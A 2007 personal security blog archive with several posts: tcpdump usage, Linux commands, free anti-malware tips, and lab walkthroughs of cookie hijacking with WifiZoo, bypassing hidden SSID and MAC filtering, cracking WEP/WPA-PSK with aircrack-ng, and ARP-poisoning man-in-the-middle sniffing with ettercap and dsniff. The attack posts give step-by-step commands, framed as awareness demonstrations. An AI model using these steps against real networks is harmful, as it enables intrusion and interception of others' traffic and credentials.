Saturday, December 29, 2007

Fun with Tcpdump

Tcpdump is a really useful program for capturing packets that are on the wire. It can be used to view packets going through your own interface, on a network with a hub, or on a switched network (arp-cache poisoning or mirrored switch ports).

The output from tcpdump can either be sent to the screen, written to a raw file using -w and viewed with tcpdump (using -r) or the capture files can be read with a tool such as Wireshark.

Tcpdump is a tool that anyone who is interested in networks should be familiar with. It will help you understand what normal traffic looks like on your network at a packet level so you can quickly identify abnormal traffic.

The purpose of this blog post is to get a few of the commands documented to familierize myself with tool so i can quickly apply filters when needed.

For the Windows users there is a very good port of tcpdump called Windump, the syntax is very similar if not identical.


Using Tcpdump

When first running tcpdump without any filters the output can be overwhelming. Don't worry about this, as you begin to get familiar with the filters you can quickly get to the information you want.

If you have multiple interfaces that are up you may need to use the -i {interface} switch.

tcpdump -i eth1

The command can be terminated with ctrl+c.

I recommend using the -n switch to prevent name resolution whilst you are performing the capture. The name resolution can always be performed later.

tcpdump -i eth1 -n

You can also cut down the amount of data you capture by using the quiet option (-q)

tcpdump -q

Or to really cut down on what i can see I could use the following which would just display the from and to, the protocol and the packet size:

tcpdump -qt

As previously mentioned the output of tcpdump can be sent to a file using the -w switch or straight to a text file using the redirect >

I recommend writing the output to libpcap format using a command such as:

tcpdump -i eth1 -n -w capture.lpc

However, you may want to view the output on the screen as you write it to a file, this can be done by using the -l switch and piping through tee into the file:

tcpdump -l | tee mydump


You can also limit the capture to a certain amount of packets using the -c switch. To only collect 100 packets:

tcpdump -c 100


The -c switch can also be used when reading from a packet capture file:

tcpdump -n -s 1514 -r capture.lpc -c 5 tcp

The command above will read the first 5 tcp packets from the capture.lpc file.




Collecting Packets Based on Size

Usually tcpdump does not collect the entire packet. Use the snaplen option -s 0 to force it to do so:

tcpdump -s 0

Or to only collect the first 1514 bytes of a packet:

tcpdump -s 1514

1514 bytes will capture the ethernet portion without VLAN tagging. To capture the VLAN tagging information an additional 4 bytes will need to be added.


To only collect packets from a particular host:

tcpdump -i eth 1 -n -w capture.lpc host 208.68.234.113


Name Resolution

As mentioned earlier, by default tcpump will resolve network addresses into names. To disable this use the -n switch. And to disable port resolution use -nn:

tcpdump -nn

Use -f to prevent remote name resolution.


If you are on a local LAN and want to capture only traffic based on a MAC address use:

tcpdump ether host 11:22:33:44:55:66:77:00

Or if you want the Ethernet header in the output use the -e option:

tcpdump -i eth1 -e -n -s 1514-w capture.lpc

To restrict the capture to a network use:

tcpdump -i eth1 -n -w capture.lpc -s 1514 net 192.168.1

or

tcpdump -i eth1 -n -w capture.lpc -s 1514 net 192.168.1.0 mask 255.255.255.0


Using Keywords

Keywords alow you to easily filter traffic. The Keywords that can be used are ip, tcp, udp, icmp and igmp.

As an example of using keywords, to capture all IP traffic use keywords:

tcpdump -i eth1 -n -w capture.lpc -s 1514 ip

or to capture just TCP traffic:

tcpdump -i eth1 -n -w capture.lpc -s 1514 tcp

Other traffic types without keywords can be captured using the "ip proto" option:

tcpdump -i eth1 -n -w capture.lpc -s 1514 ip proto l2tp

or by its protocalnumber as found in the /etc/protocols file:

tcpdump -i eth1 -n -w capture.lpc -s 1514 ip proto 115


To capture traffic based on it's application from further up the stack such as ftp traffic specify the port:

tcpdump -i eth1 -n -w capture.lpc -s 1514 port 21

And to capture the data portion of the FTP traffic as well you could add port 20:

tcpdump -i eth1 -n -w capture.lpc -s 1514 port 21 && port 20

This could have been specified by name as detailed in the /etc/services file.

tcpdump -i eth1 -n -w capture.lpc -s 1514 port ftp && port ftp-data

In the examples above I have used && to add 2 filters together. I could have used the word 'and' instead. You can also use 'or' to idicate that i want one filter to apply or another filter to apply. || means the same as 'or' also.

tcpdump -i eth1 -n -w capture.lpc -s 1514 port http or https
tcpdump -i eth1 -n -w capture.lpc -s 1514 port 80 || 443

The above filters will capture the same data.


Filtering by Packet Size

You could create a filter to capture packets that are larger than a certain size (in bytes):

tcpdump -i eth1 -n -w capture.lpc -s 1514 greater 250

This type of filter can be useful if you are trying to locate certain types of packet based on attributes from further up the stack.




We can also tell tcpdump to leave out certain types of traffic, in this example we don't want http or https traffic but we want everything else:

tcpdump -i eth1 -n -w capture.lpc -s 1514 " (not tcp port http and not tcp port https)"



To view the output in output in ascii use -X (the verbose -v is optional):

tcpdump -i eth1 -n -w capture.lpc -s 1514 -X -v

To dump the whole packet in hex use:

tcpdump -i eth1 -n -w capture.lpc -s 1514 -x -v


Further Examples

To display a list of visited sites:

tcpdump -w dumpfile
tcpdump -r dumpfile > textfile
cat textfile /usr/bin/cut -f 8 -d ' ' /bin/grep -i www*


Looking at ICMP

Although you can capture all ICMP traffic, you could actually capture only particular types of ICMP based on attributes of the protocol. For example, if i wanted to capture just ICMP echo requests knowing that an ICMP echo request is a Type 8 i might use:

tcpdump -e -x "icmp[0]=8"

To capture just ICMP repies (Type 0) i might use:

tcpdump -e -x "icmp[0]=0"


Wireless Stuff

If i was curious about what networks wireless clients are probing for I could set my card into promiscuous mode (ifconfig -i eth1 promisc), configure my wireless settings to monitor (iwconfig eth1 mode monitor) and issue the following command:

tcpdump -i eth1 -s0 -nn -vv -t | grep -i request

This would reduce the output to just display probe requets from nearby wireless clients.




Note: I will update this blog entry with new and interesting uses for Tcpdump as I learn them.


Links

For a great book on network monitoring using Tcpdump as well as many other opensource tools try "The Tao of Network Security Monitoring" from Richard Bejtlich.

Another great book on this topic is "Practical Packet Analysis"

Friday, December 28, 2007

Stealing Cookies with WifiZoo

The purpose of this blog post is to demonstrate the sort of thing an attacker could do just by listening to your traffic on a wireless network.

In the example below I will set my wireless card to capture cookies from a valid session between a victim and a website. The attacker is then able to easily connect to the website using the captured cookie and will automatically be logged in as the victim.

I have tested this on a number of websites including Google Mail, however, i will demonstrate this using a connection to a web forum called Binary Revolution. Please note, this is not possible due to a fault with the websites, it is possible due to unencrypted traffic. That said, I could perform the same attack on a wired network using arp-cache poisoning.


Tools

  • Kismet
  • WifiZoo
  • Firefox

The Attack

1. Using Kismet I find my target network and force it to lock onto just that channel.




2. I now use the command below to bring up my wireless interface.

ifconfig wlan0 up


3. I start Wifizoo, point my Firefox proxy settings to 127.0.0.1 port 8080 and point my browser to the wifizoo config page on http://127.0.0.1:8000




4. I now connect my LAN interface to the network, bring it up and get an IP address.

ifconfig eth0 up dhclient eth0


5. On the victim PC which is using a wireless connection I browse to an interesting site and log in.




6. Back on my evil attacker laptop I look at the cookies page In the WifiZoo webpage and see what cookies i have collected so far.



I select a cookie, click on it and I'm taken straight into the website using the victims credentials.



It really is that simple. So next time your on a public network think about what you are doing.


Conclusion

Be careful on public networks, use encryption (SSL and SSH) and VPN's where possible.


Tools used in this blog post were from the BackTrack3 security distro.

Bypass Hidden SSID & MAC Address Filtering

The purpose of this blog post is to demonstrate why hidden SSID & MAC Address filtering should only be layers of wireless security used in conjunction with strong encryption such as WPA.

Below are the steps an attacker could take to bypass a hidden SSID and MAC Address filtering to gain a foothold on your network and either instigate further attacks or use your internet connection.

Tools

  • Kismet

The Attack

1. I first use kismet to look at the wireless networks within range.



My target wireless network is "batman". I can see from kismet that this has no encryption and the SSID is hidden.

At this stage I wouldn't know that the AP was using MAC Address filtering so I could try to join the network using:

iwconfig eth1 essid batman

Then I would try to obtain an IP address using:

dhclient eth1

The request for an IP Address would fail as the WAP is filtering MAC addresses.


2. Within Kismet I look at the clients connected to "batman" to obtain a valid client MAC address.



I see an active client is using the MAC of 00:16:6F:4D:AE:8C

I could then either wait for the client to disconnect or use a tool such as aireplay-ng to force a disconnection. As this is a test lab I will simply disconnect the valid client.


3. I check my current wireless card config using ifconfig



Note: I see that Kismet has not brought the card out of promiscuous mode. This will need to be done manually.


4. I now want take my card out of promiscuous mode, change my MAC address to that of the valid client, and join the hidden (batman) network. To do this I use the following commands:

ifconfig eth1 -promisc
ifconfig eth1 down
ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
ifconfig eth1 up
iwconfig eth1 essid batman



I verify the output of these commands with ifconfig and iwconfig as i go along.


5. I now request an IP address from the DHCP server on the WAP using:

dhclient eth1



I have successfully been assigned an IP address of 192.168.1.202 from the WAP (192.168.1.5 hmmm this is useful to know as I can try the web interface on that using either default passwords (Kismet will tell me the make of the WAP) or hydra........)

If the WAP was not using DHCP I would at this stage configure my card manually and set up my own DNS.


7. I now test connectivity to the web using ping:

ping www.yahoo.com



my ping works, this tells me I have web access and DNS is working correctly.


Conclusion

Hopefully this demonstration has proven to you how simple it is for an attacker to bypass some of the more basic restrictions. Don't rely on a hidden SSID or MAC Address filtering as your only security measures. They may stop the average neighbor from using your internet connection but they will not prevent an attacker from breaking into your network and using your internet connection.

Sunday, December 23, 2007

Wireless Network Penetration

The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password.

The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate.

The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.

Tools

  • airodump-ng
  • aireplay-ng
  • aircrack-ng
  • Wireless Assistant


The Attack

1. I first run airodump-ng to identify the networks I can see. This also makes sure my card is configured correctly.

airodump-ng wlan0



I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).

If my card wasn't correctly set up (i.e in promiscous and in monitor mode) I could either run airmon-ng or set it up manually as detailed below:

ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Then I would use ifconfig and iwconfig to make sure the settings were correct.

2. I now run airodump-ng with switches to tell it to only collect the Initialization Vectors (IV's) on channel 3 ad output it to a file using my wireless interface (wlan0)

airodump-ng --ivs -c 3 -w wepdump wlan0



The result of this are 2 files, wepdump-01.txt & webdump-01.ivs. The .ivs file is the one I am interested in.

When capturing data to break WPA-PSK do not use the --ivs switch. The entire packet needs to be captured. Another requirement packets to crack WPA-PSK is to force the client to re-associate with the AP. this can be done using the aireplay-ng tool and the following syntax:

aireplay-ng -0 1 -a {AP BSSID} -c {client BSSID} wlan0

To obtain the AP & client BSSID's i use kismet, however this can be done with aireplay-ng. Check out the switches.


Note: when collecting the IV's having the best signal possible will speed things up.


3.After 15 mins I stop the capture and run the collected IV's through aircrack-ng. I specify the BSSID in this command.

aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs



As you can see it has decrypted the key as C3:C0:8C:90:3D

If i was decrypting WPA-PSK i would need to specify a dictionary file containing the password with the -w switch. My syntax would therefor look like this:

aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap


4. I now reconfigure my wireless card to connect to the wireless network.



Currently the card is in monitor mode so I reconfigure it using the following commands:

ifconfig wlan0 down

ifconfig wlan0 -promisc

iwconfig wlan0 managed

ifconfig wlan0 up

Once reconfigured I quickly check I can see the target network using:

iwlist scan


5. I now use the Wireless Assistant to connect the target network with the key.




6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.



Now I have an IP on this network I can either use this network connection to access the Internet or to perform further attacks against hosts on the wireless network or I could capture the web traffic and do interesting things with that.


Conclusion

WEP encryption is very broken. Only use as a last resort, and if no other encrytion is available. If you do need to use WEP use additional layers of security to protect your network further such as MAC Address Filtering, Hidden SSID, Fixed IP's or a limited DHCP scope. These additional measures can all be bypassed but they make the attackers job that little bit harder.


Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!


Links

Thursday, December 13, 2007

Protect Your PC for Free

I'm often asked by friends and family what to use to protect there PC's against Spyware and Viruses. The purpose of this blog post is just to simply list a selection of free tools that people can use to clean up and protect their PC's against the threats posed by Malware.

Malware (i lump Spyware and viruses together to form Malware by the way) is a program or code that has been created with malicious intent. That intent may be to steal your identity, invade your privacy, or to use your computer to attack other internet systems without your knowledge.

One important note, make sure to update the signatures for the tools you use. New threats emerge on a daily basis and for your software to protect you against these threats it must know about them, the way it knows about them is by signature updates.

As with any software, i urge the person installing that software to become familiar with it. Read the programs help files, Google "software-name tutorial", click around in the interface and look at the various options. Only by becoming familiar can you use the tool to it's full potential and effectively protect your computer.

I'll list the tools in the order I consider the most relevant.

1. Windows Password
Make sure you have set a good password on your account. If you have either a blank password or an easy to guess password Malware or attackers can use dictionary based attacks to guess these.

It is also important to have good passwords on all your accounts such as email, internet banking, Face Book etc.. Think of it like this, if i can guess your email password or use a program to guess it using a dictionary based attack and get into your email, i could then could then try the same password on your bank. If that fails i could go to the bank website and tell the bank i have forgotten the password and it will email a new one to your email account which i have access to. BINGO!

Change you password in Windows by either pressing Ctrl-Alt-Delete and selecting Change Password or by going into the Control Panel (Start Menu > Control Panel) and selecting User Accounts. If you have a Administrator account as well as your own change this password to something strong also.

A good or strong password is a word or phrase that is longer than eight characters, has numbers in it and uses symbols (&%$* etc...) and has a capital letter or two. An example is:

AGoodStr0ngP&$word!

or

(SynJunki3isTh3Gr3at3st)


2. Windows Update.
As vulnerabilities are discovered Microsoft releases patches to fix these and prevent attackers and code from exploiting the vulnerabilities. These patches are released every month but occasionally Microsoft will release critical patches out of cycle if it deems it necessary. Windows can be set to retrieve these patches automatically.

To do this in XP:

  1. On the Start Menu, click on the Control Panel and depending on your view select either Security Centre or Automatic Updates.
  2. From the window presented configure automatic updates and click OK.
In Vista it's pretty much the same.


3. Windows Firewall
If you consider your computer as a house, it has lots of windows and doors (131,072 to be exact) and these can be easily opened by programs on your computer without you knowing. A firewall will effectively close these windows and doors and only open them if you give permission.

Windows has a built in firewall, it's not the best in the world but it's alright. Turn the firewall on in the Security Center (Control panel again) and have a look at it's settings to become familiar with it. You can view the firewall settings by looking at the Exceptions tab on in the Firewall Settings. Here it lists all the programs that are allowed to bypass the firewall.

Also make sure the tick box for "Display a notification when Windows Firewall blocks a program" is ticked. This will then prompt you when something wants to change your settings.

If you see a program listed that you are unsure of, Google it and find out what it is. You can always remove the tick on the application in the list or delete the entry and next time the programs wants to go out you will get a prompt. Then you'll have a better idea what it is.

Also check out the advanced tab, if you have multiple network cards (LAN and wireless) you can set these up differently or check the options on both.


3. Spybot Search & Destroy
Spybot Search & Destroy (S&D) is a free program that is has many useful functions. Once installed click on the updates button and download the latest updates. Alternatively you can download updates from the website.

After installing the latest updates, click on the immunize button. This will protect your PC from all the current threats that Spybot S&D knows about.

Following immunization click on the "Check for problems" button. This will scan your PC for any installed Spyware and give you the option to fix the problem. Do this a couple of times and if you cannot get rid of something google it and find out more about the problem. Chances are someone has already had the same problem and you can see what they did to fix it.

Update your signatures, immunize your PC and scan for Spyware on a frequent basis, i perform this type of updates and scanning every week.

Spybot S&D has many other Advanced options with can be enabled by the mode drop-down menu. The options allow you to schedule scans, securely shred documents and tweak windows settings among other things.

If you use Spybot S&D please consider making a donation to the software vendor. You can do this by selecting Donations from the Help menu in Spybot S&D


4. Avast Anti-virus
Avast is a really good free Anti-Virus scanner. Once installed it will permanently run in the background and scan any opened files for viruses. You can also scan a drive or file by right-clicking on whatever you want to scan and clicking Scan.

Avast is free for home use but you will need to register it. It will automatically download updates.

You can set the options on Avast by opening the Avast interface from the Start menu (or by he System Tray by the clock). Holding you mouse above any buttons will display a description of the functions available.


5. CCleaner
CCleaner is a registry cleaner that will clean up the registry on your computer. It will look for old entries, missing Dll's and many other registry related problems.

As well as being a brilliant little tool for help you understand what programs store what information and where (by selecting just that program and performing a scan) CCleaner can remove entries in programs and windows to help protect your privacy. Internet Cookies, list of recently accessed files, browser history, log files


6. McAfee Rootkit Detective
Rootkits are becoming more popular these days as once they installed they can hide themselves from the operating system. Often AV scanners will not detect rootkits and they are as malicious as any other form of spyware or virus. McAfee developed a free tool to detect and remove rootkits. Rootkit Detective is very simple to use. After installation simply run the scan and remove anything it finds. If it does find something and you are unsure whether to remove it or not just Google it. Google will tell you if what has found is bad. Google is your friend. (Sort of.)


Other
As poeple get better at applying patches and using firewalls etc... Attackers are targeting other applications that have widespread usage, such as Adobe Acrobat, Winzip, Quicktime and i-Tunes. As these will not be included the Microsoft patch cycle they are often forgotten about and become a viable target. If you use these applications check on a weekly or even monthly basis to see if there is a newer version, or have a poke around in the application itself to see if you can find a update function or update link.


Links

Friday, December 7, 2007

Basic Linux Commands

The purpose of this blog entry is to document a few basic Linux commands that i find useful. I'm fairly new to Linux and recording these commands gives me a point of reference and helps me remember them.

It's important to note that in Linux syntax is case sensitive.

I am using Ubuntu so my syntax may differ slightly to yours if you are using another distro. If you want to learn more about any of the commands i list try the following:

man command (e.g man ls)

or

command -h

or

command --help


The sections i have added so far are:

1. Users
2. Navigation
3. Files
4. Networking
5. Hardware
6. System Tools


I will add to this document as i learn more commands.



1. Users

To add a new user called bob:

adduser bob

To switch to a new user called bob:

su bob

To change bobs password:

passwd bob

To switch straight to root:

su

To run a command as root whilst logged in as another user:

sudo command

* this assumes you are in the sudo group.

To view which user you are currently logged in as use:

whoami


2. Navigation

To list directories use:

ls

To list all directories including hidden and permissions use:

ls -la

To list all directories in another folder use the following syntax:

ls -la /home/bob/

In the output anything preceded with a . is hidden.


To change directory use:

cd directory_name

Or the path:

cd /etc/directory_name

To move back in the directory structure use:

cd ..

or

cd ../..

To navigate directly to the root / directory:

cd /

To navigate directly to your home directory:

cd #

To print the current directory use:

pwd


3. Files

To view the contents of a file:

cat filename.txt

To delete a file:

rm filename.txt

To delete all files and directories and sub-directories (without prompting)

rm -Rf directory_name

To locate a file:

locate filename.txt

To change the owner of a file use:

chown bob filename.txt

To change the group ownership as well use:

chown bob:users_group filename.txt

To create a directory use:

mkdir mydirectory

To create a file use:

touch myfilename

To move or rename a file use:

mv file1 file2

To copy a file to bobs home directory use:

cp file1 /home/bob/


4. Networking

To obtain a DHCP address (on all interfaces):

dhclient

Or on just one particular interface:

dhclient eth1

To view the interface network properties:

ifconfig

To set the IP address of a interface:

ifconfig eth1 192.168.1.100/24

To change the MAC address of an interface:

ifconfig eth1 hw ether 11:22:33:44:55:66:77:00

To put an interface into promiscuous mode:

ifconfig eth1 promisc

To take an interface out of promiscuous mode:

ifconfig eth1 -promisc

To view the wireless interface settings:

iwconfig

To set the wireless interface to a particular wireless AP:

iwconfig eth1 essid my_wireless_network

To set the wireless interface to managed mode:

iwconfig eth1 mode managed

To set a wireless interface to monitor mode (for sniffing etc..)

iwconfig eth1 mode monitor

To configure WEP encryption on a wireless interface:

iwconfig eth1 enc {enc key}

To configure a wireless interface to use a particular channel:

iwconfig eth1 channel 3

To view the routing table:

route

To view the routing cache:

route -C

To set a static route to a network:

route add -net 172.16.1.1 netmask 255.255.0.0 dev eth1

To set a static route to a host:

route add -host 80.127.23.65 eth1

To delete a route:

route del -host 80.127.23.65 eth1

To add a default gateway of 192.168.1.1:

route add default gw 192.168.1.1


Tracerouting in linux uses UDP packets as oppose to Windows using ICMP.

To traceroute to a target (yahoo in my example) use:

traceroute www.yahoo.com

Another really cool program i found on my system for tracerouting and providing really useful diagnostic info is mtr:

mtr www.yahoo.com

Bear in mind that unlike traceroute mtr use ICMP echo requests.

To list all network connection (external):

netstat -punta

To list network statistics:

netstat -s

To list statistics on an interface:

netstat -i eth1

For a continuous listing on any netstat commands add -c to the command:

netstat -punta -c


To list any IPTables rules:

iptables -L -v

To quickly add a rule to drop ICMP requests:

iptables -A OUTPUT -p icmp -d 0/0 -j DROP

The above command appends (-A) a rule to the output (OUTPUT) chain telling it that ICMP (-p ICMP) from any destination (-d 0/0) should be dropped (-j DROP)

To remove your rule you can use the command:

iptables -F OUTPUT

To flush all rules use:

iptables -F

To remove any currently active rules:

iptables -X

The following rules can be used to rate limit connections to prevent brute-force login to port 21 (for FTP)

iptables -I INPUT -p tcp --dport 21 -i eth1 -m state --state NEW -m recent \

  --set

iptables -I INPUT -p tcp --dport 21 -i eth1 -m state --state NEW -m recent \
--update --seconds 60 --hitcount 4 -j DROP
Using the rule above will drop any more than 3 connection attampts in 60 seconds from the same IP address.


(I will post a blog article on iptables rules)


Or to block icmp you could run or script the following command:

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

The default is 0, to to revert it back use:

echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

To use a capture network traffic:

ifconfig eth1 promisc
tcpdump -i eth1 -vv


All the above commands assume the interface is eth1. If you are unsure which is your wireless interface run iwconfig and look for the interface with the wireless extensions.



5. Hardware

To list installed hardware (available on ubuntu):

lshw

To list all PCI devices:

lspci

To list all USB devices:

lsusb

To list the loaded modules

lsmod

Another useful trick i have found relating to hardware, is when i attach a new USB HDD and i am unsure of the what it will be called, i attach the device and then immediately look at /var/log/messages for the last entries. This usually gives me what i need. The tail command is useful here.

tail -n 10 /var/log/messages

This will display the last 10 lines of the log file.

To use tail and have it update (-s 2 will update every 2 seconds) as the log updates use the following command:

tail -n 10 -s 2 -f /var/log/messages

Running the dmesg command will also reveal useful information about hardware.


6. System Tools

To view free disk space use:

df -h

To view disk usage on the system use:

du

du can also specify a directory:

du /home/bob/

A useful tool for viewing running processes is top:

top

or for a more interactive version:

htop

You can also use ps to view process information.

To view a list of all running processes:

ps aux

To view a list of processes by a particular user (bob):

ps U bob

To view process in a tree:

ps -eH

To kill a process by it's PID (example of 28556):

kill 28556


Mounting Disks

To view a list of currently mounted file systems view /etc/mtab or use:

mount -L

To mount a disk first create a folder which you will mount it to:

mkdir /media/usb

mount - t ntfs /dev/sdb /media/usb

To unmount a disk:

umount /media/usb






What I'm Working On

The purpose of his post is just to list the blog projects i'm working on. To sort of commit to something and make sure i continue to get a post out every week.

The list is in no particular order. some topics are quick ones and others require more research. It all depends on what time a can make.

What's Coming Up

  • Windows 2003 Server Hardening
  • Recovering Files From a Formated Disk
  • Bluetooth Hacking
  • Captive Portal Fun
  • Passive Information Leakage
  • Securing Stuff with SSH

For the moment that's all.

Saturday, December 1, 2007

Wireless Fun For Bad People!

This blog post is a quick one to demonstrate just how vulnerable your information is if your using a network, be it wired or wireless.

Strong encryption would mitigate this risk, however it would only mitigate it if you are the only person on that network. So if your on a work network, a coffee shop wireless network or any other network with other people also on the network, this type of attack is totally possible. In my examples below i am on a wireless network using WPA encryption, however my attacker is also authenticated to the same wireless access point. This is a common scenario.

In the case of a wired network this attack would only work if the atacker is on the same LAN as his victim.

Okay, on to the attack. In the examples below the victim is 192.168.1.200, the gateway (WAP) is 192.168.1.5.

What I used.

  • Ettercap
  • Webspy (part of the dsniff suite of tools)
  • Driftnet
  • Firefox (or any browser)

What I did

In this scenario i'll be running Ubuntu (7.10) as root. It is important that I use root to use the tools listed above. Once I have figured out where the gateway which is easy enough (route) i pick my target (192.168.1.200) and the gateway and i arp poison them to become the Man-in-the-Middle.

ettercap -T -M arp:remote -i eth1 /192.168.1.200/ /192.168.1.5/



This effectively sets me up between the target and the gateway and i receive all the traffic. If i had wanted to grab all traffic going out from any host on that LAN i would have used:

ettercap -T -M arp:remote -i eth1 /192.168.1.5/ //


I then configure ip forwarding by running the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

I then use cat to check it's enabled (1).

cat /proc/sys/net/ipv4/ip_forward



Next i set up Webspy. Webspy is part of the Dsniff suit of tools and will send any URL's visited to my browser. I did try to use the Remote Browser plugin for ettercap but it wouldn't work as reliably as Webspy.

webspy -i eth1 192.168.1.200



Webspy is pretty cool and in testing sent about 80% of the URL's to my listening browser but not all of them and not secure sites using SSL (https).


Next start up Firefox. This needs to be done as root. Any browsed URL's will be sent to this browser and open up a new tab for each URL. Other browsers will probably work bu i never tested them.


Then i might set up Driftnet. Driftnet can capture images or audio and save it to a directory, but in my example i will just send it to my screen.

driftnet -i eth1



As you can see from my Driftnet window above my target is browsing Binrev and obviously has great taste!

I could have also fired up Dsniff to grab password and stuff at this stage using:

dsniff -i eth1

So if it's not to obvious by now why this is a problem, think of it like this. When you log into your email in a web cafe or on a train on the wireless network, when you look at your email, or read anything online, even if your computer is fully patched and your using a super new firewall and it's set up correctly, your still vulnerable to someone seeing amost everything you do online.

And that's it. Just a little sniffing fun. And remember, as i said this type of fun can be had on wired LANs too.